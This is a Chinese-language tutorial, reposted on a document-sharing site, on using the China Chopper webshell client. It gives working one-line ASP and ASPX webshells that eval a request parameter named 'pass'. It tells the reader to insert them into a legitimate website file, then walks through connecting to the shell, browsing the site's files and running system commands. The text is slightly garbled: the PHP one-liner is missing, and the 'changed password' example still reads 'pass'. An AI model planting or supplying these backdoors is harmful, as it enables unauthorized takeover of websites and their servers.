中国菜刀使用教程
本文作者:杨凡,QQ:673116767,收徒,论坛:www.notfan.com,博客:blog.notfan.com
双击打开,软件运行界面如图:
首先说一下菜刀的功能,菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request("pass")%>
aspx的一句话是:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
php的一句话是: 这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request("pass")%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp文件,这个asp文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,如图:
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填,如图:
本文作者:杨凡,QQ:673116767,收徒,论坛:www.notfan.com,博客:blog.notfan.com
本文作者:杨凡,QQ:673116767,收徒,论坛:www.notfan.com,博客:blog.notfan.com
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了,如图:
在菜刀里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能,如图:
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了,如图: 本文作者:杨凡,QQ:673116767,收徒,论坛:www.notfan.com,博客:blog.notfan.com
本文作者:杨凡,QQ:673116767,收徒,论坛:www.notfan.com,博客:blog.notfan.com
其他的功能自己摸索吧,我就不多说了。
本文作者:杨凡,QQ:673116767,收徒,论坛:www.notfan.com,博客:blog.notfan.com
本文档为【中国菜刀使用教程】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑,
图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
该文档来自用户分享,如有侵权行为请发邮件ishare@vip.sina.com联系网站客服,我们会及时删除。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。
本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。
网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。